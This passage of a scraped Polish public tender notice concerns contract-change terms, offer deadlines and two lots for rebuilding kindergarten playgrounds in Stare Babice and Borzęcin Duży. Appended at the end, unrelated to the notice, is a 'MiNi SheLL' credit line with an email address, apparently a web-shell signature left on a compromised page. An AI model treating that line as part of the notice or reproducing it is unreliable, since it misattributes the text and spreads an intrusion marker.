</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość wprowadzenia zmian do treści zawartej umowy dotyczące zmiany przedmiotu umowy lub zmiany terminu wykonania przedmiotu umowy w następujących przypadkach:
1)z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa,
2)z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu umowy proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
3)z powodu wystąpienia robót dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego Wykonawcę,
4)z powodu wystąpienia robót uzupełniających, których realizacja ma wpływ na termin wykonania zamówienia podstawowego,
5)z powodu okoliczności siły wyższej, niezależnej od Zamawiającego i Wykonawcy, a której nie można było przewidzieć i która nie pozwala na kontynuację robót będących przedmiotem umowy, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
6)z powodu działań osób trzecich uniemożliwiających wykonanie przedmiotu umowy, które to działania nie są konsekwencją winy którejkolwiek ze stron,
7)z powodu wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć w chwili zawarcia umowy pomimo zachowania należytej staranności. 
2.Zamawiający przewiduje również możliwość wprowadzenia zmian do treści zawartej umowy w przypadku wejścia w życie zmiany przepisów w zakresie wysokości podatku od towarów i usług (VAT) mających zastosowanie w czasie realizacji niniejszej umowy, wynagrodzenie brutto Wykonawcy za część robót wykonywaną po tym terminie ulegnie stosownym zmianom natomiast wartość wynagrodzenia netto pozostanie bez zmian.
3.O wystąpieniu okoliczności mogących wpłynąć na zmianę przedmiotu umowy lub terminu wykonania przedmiotu umowy Wykonawca natychmiast poinformuje Zamawiającego pisemnie. 
4.Zamawiający przewiduje również możliwość wprowadzenia zmian do treści zawartej umowy dokonane na podst. art. 144 ust. 1 ustawy Prawo zamówień publicznych w zakresie zmian nieistotnych, rozumianych w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o udzielenie zamówienia czy też wynik postępowania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.stare-babice.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> U.G. Stare Babice, ul. Rynek 32, 05-082 Stare Babice, pok. 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2016 godzina 12:00, miejsce: Ofertę należy złożyć w U. G. Stare Babie, ul. Rynek 32 w pok. nr 18 - Sekretariat do 30.06.2016 r. do 12:00. Otwarcie ofert 30.06.2016 r. godz. 12:05.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja palcu zabaw przy Przedszkolu w Starych Babicach przy ul. Polnej 40 - etap 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie m. in. następujących robót budowlanych oraz czynności:
demontaż elementów małej architektury;
wykonanie nawierzchni bezpiecznej (piaskowej) o powierzchni około 280 m2;
dostawę i montaż obrzeży gumowych prefabrykowanych około 26 m.b.;
wykonanie obrzeży elastycznych pomiędzy żywopłotem a placem zabaw około 47 m.b.;
zadaszenie istniejących piaskownic;
dostawę i montaż urządzeń zabawowych takich jak:
zjeżdżalnia,
zestaw zamek (wyposażony w: 4 wieże, mostek z sieci linowej, mostek stały lub ruchomy, przełaz rurowy, schody, 2 ścianki wspinaczkowe, rurę strażacką, przeplotnię liniową, zjeżdżalnie),
bujak deska surfingowa,
huśtawka ważka,
bujak trójosobowy,
bujak quad,
zestaw sprawnościowy 4 wieże (wyposażony w: 3 wieże zadaszone, 1 wieżę niezadaszoną, 2 mostki ruchome, drabinkę linową, przeplotnie linowe min 2szt., ściankę wspinaczkową, poręcz ześlizgową),
zestaw domek (wyposażony w: dach, pełne ściany z otworami okiennymi i drzwiowymi, stolik i ławę),
huśtawka wahadłową (podwójną),
rekultywację trawników o powierzchni ok. 30 m2,
uzyskanie certyfikatu zgodnie z obowiązującymi normami (w tym z grupy PN-EN 1176)  na wykonane prace i zamontowane urządzenia,
i)sporządzenie i przekazanie Zamawiającemu dokumentacji powykonawczej (wraz z certyfikatem na wykonane prace i zamontowane urządzenia) i inwentaryzacji geodezyjnej powykonawczej (Zamawiający dopuszcza, aby w dniu odbioru Wykonawca przedstawił szkice geodezyjne wraz z potwierdzeniem zgłoszenia złożenia inwentaryzacji geodezyjnej do kartowania w składnicy map a dostarczył ją po kartowaniu)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.09.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja palcu zabaw przy Przedszkolu w Borzęcinie Dużym przy ul. Warszawskiej 697 - etap 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie m. in. następujących robót budowlanych oraz czynności:
demontaż elementów małej architektury;
wykonanie nawierzchni bezpiecznej (piaskowej) o powierzchni ok. 305 m2;
dostawę i montaż 2 ławek z oparciem;
dostawę i montaż urządzeń zabawowych takich jak:
zjeżdżalnia,
zestaw zamek (wyposażony w: 4 wieże, mostek z sieci linowej, 2 mostki stałe, mostek ruchomy, 2 ścianki wspinaczkowe, rurę strażacką, przeplotnię linową, zjeżdżalnię, częściowo pełne boki dolnych części wież),
zestaw sprawnościowy (wyposażony w: 4 słupy wspinaczkowe, przeplotnię linową, ściankę wspinaczkową, równoważnię z linką z ruchomym uchwytem, drabinkę poziomą, 2 drabinki skośne),
bujak trójosobowy;
huśtawka ważka.
uzyskanie certyfikatu zgodnie z obowiązującymi normami (w tym z grupy PN-EN 1176)  na wykonane prace i zamontowane urządzenia.
sporządzenie i przekazanie Zamawiającemu dokumentacji powykonawczej (wraz z certyfikatem na wykonane prace i zamontowane urządzenia) i inwentaryzacji geodezyjnej powykonawczej (Zamawiający dopuszcza, aby w dniu odbioru Wykonawca przedstawił szkice geodezyjne wraz z potwierdzeniem zgłoszenia złożenia inwentaryzacji geodezyjnej do kartowania w składnicy map a dostarczył ją po kartowaniu).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. Rękojmia za wady - 0.05</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com